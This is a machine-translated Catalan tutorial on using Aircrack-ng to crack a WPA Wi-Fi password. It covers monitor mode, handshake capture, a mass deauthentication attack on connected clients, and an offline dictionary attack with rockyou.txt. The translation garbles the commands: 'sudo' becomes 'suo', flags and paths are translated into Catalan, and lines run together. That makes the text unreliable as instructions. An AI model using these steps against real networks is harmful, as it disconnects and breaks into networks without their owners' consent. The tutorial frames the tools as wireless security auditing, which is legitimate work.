Airmon-ng
Airmon-ng s’utilitza per gestionar els modes de targeta sense fils i per matar processos innecessaris mentre s’utilitza aircrack-ng. Per detectar una connexió sense fils, heu de canviar la targeta sense fils del mode gestionat al mode de monitorització i s’utilitza airmon-ng per a aquest propòsit.
Airodump-ng
Airodump-ng és un sniffer sense fils que pot capturar dades sense fils d’un o més punts d’accés sense fils. S'utilitza per analitzar els punts d'accés propers i per capturar encaixades de mans.
Aireplay-ng
Aireplay-ng s'utilitza per atacs de reproducció i com a injector de paquets. Es poden desautenticar els usuaris dels seus AP per capturar encaixades de mans.
Airdecap-ng
Airdecap-ng s’utilitza per desxifrar paquets sense fils WEP, WPA / WPA2 xifrats amb clau coneguda.
Aircrack-ng
Aircrack-ng s’utilitza per atacar protocols sense fils WPA / WEP per tal de trobar la clau.
Aircrack-ng és fàcil d’instal·lar a Ubuntu mitjançant APT. Simplement escriviu l'ordre següent i s'instal·laran totes les eines disponibles a la suite Aircrack-ng.
suo apt-get updatesuo apt-get install -iaircrack-ng
Ús
En aquest article, veurem ràpidament com utilitzar aircrack-ng per trencar una xarxa sense fils xifrada (TR1CKST3R en aquest exemple) per trobar la contrasenya.
Primer de tot, enumereu totes les targetes sense fils disponibles connectades al vostre PC mitjançant l’ordre ‘iwconfig’.
Utilitzarem la targeta sense fils anomenada 'wlxc83a35cb4546' per a aquest tutorial (pot ser que sigui diferent en el vostre cas). Ara, elimineu tots els processos que s’executen amb targeta sense fils mitjançant airmon-ng.
[correu electrònic protegit]: ~ $suocomprovació airmon-ngmatarEscriviu per iniciar el mode Monitor a 'wlxc83a35cb4546'
[correu electrònic protegit]: ~ $suoairmon-ng start wlxc83a35cb4546
Ara, airmon-ng ha iniciat el mode Monitor a la targeta sense fils, apareixerà amb un nom diferent 'wlan0mon'. Torneu a executar ‘iwconfig’ per llistar els detalls sense fils.
A continuació, utilitzeu airodump-ng per veure els punts d'accés sense fils propers i les seves propietats.
[correu electrònic protegit]: ~ $suoairodump-ng wlan0mon
Podeu restringir la cerca mitjançant filtres MAC (–bssid) i canal (-c). Per capturar l'aproximació de mans (l'aproximació de mans conté una contrasenya xifrada), hem de desar els paquets en algun lloc mitjançant l'opció –write. Tipus,
[correu electrònic protegit]: ~ $suoairodump-ng--bss6C: B7:49: FC:62: E4-c 11wlan0mon--escriure /tmp/encaixada de mans
--bss: Adreça MAC del punt d’accés
-c: Canal del punt d’accés[1-13]
--escriure: Emmagatzema els paquets capturats en un lloc definit
Ara, hem de desautenticar tots els dispositius d’aquest punt d’accés mitjançant la utilitat Aireplay-ng. Escriu
[correu electrònic protegit]: ~ $suoaireplay-ng-0 100 -a [MAC_ADD]wlan0mon
-a: especifiqueu els punts d'accés MAC per a Aireplay-ng
-0: especifiqueu el nombre de paquets deauth que cal enviar
Al cap d’un temps, tots els dispositius es desconnectaran d’aquest punt d’accés, quan intentaran tornar a connectar-se, si s’executa airodump-ng es capturarà l’aprimat de mà. Apareixerà a la part superior de l'execució de airodump-ng.
L’aplicació de mans s’emmagatzema al directori ‘/ tmp /’ i conté una contrasenya xifrada que es pot forçar sense connexió mitjançant un diccionari. Per esborrar la contrasenya, farem servir Aircrack-ng. Tipus
[correu electrònic protegit]: ~ $suoaircrack-ng/tmp/handshake.cap-01.cap-en/usr/Compartir/llistes de paraules/rockyou.txt
-en: Especifiqueu la ubicació del diccionari
Aircrack-ng passarà per la llista de contrasenyes i, si es troba, mostrarà la contrasenya utilitzada com a clau.
En aquest cas, aircrack-ng ha trobat la contrasenya utilitzada '123456789'.
Ara, atureu el mode Monitor a la targeta sense fils i reinicieu el gestor de xarxa.
[correu electrònic protegit]: ~ $suoairmon-ng stop wlan0mon[correu electrònic protegit]: ~ $suoreinici del gestor de xarxa del servei
Conclusió
Aircrack-ng es pot utilitzar per auditar la seguretat sense fils o per esborrar contrasenyes oblidades. Hi ha altres eines similars disponibles per a aquest propòsit, com Kismet, però aircrack-ng és més conegut per tenir un bon suport, versatilitat i tenir una àmplia gamma d'eines. Té una interfície de línia d’ordres fàcil d’utilitzar que es pot automatitzar fàcilment mitjançant qualsevol llenguatge de seqüència d’ordres com Python.